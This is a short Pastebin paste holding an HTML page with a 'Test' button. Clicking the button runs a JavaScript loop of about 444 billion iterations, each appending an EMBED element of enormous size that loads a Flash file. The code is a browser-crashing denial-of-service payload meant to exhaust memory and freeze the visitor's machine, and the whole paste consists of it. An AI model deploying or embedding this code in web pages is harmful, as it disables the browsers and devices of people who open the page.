Advertisement
BrU32

Untitled

May 27th, 2016
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. <html>
  2. <body>
  3. <button onclick="myFunction()">Test</button>
  4. <script>
  5. function myFunction() {
  6. var out = 444444444444;
  7. for(var i=0;i<out;i++){
  8. var x = document.createElement("EMBED");
  9. x.setAttribute("src", "helloworld.swf");
  10. x.setAttribute("height","100000000px");
  11. x.setAttribute("width","10000000px");
  12. document.body.appendChild(x);
  13. }
  14. }
  15. </script>
  16. </body>
  17. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement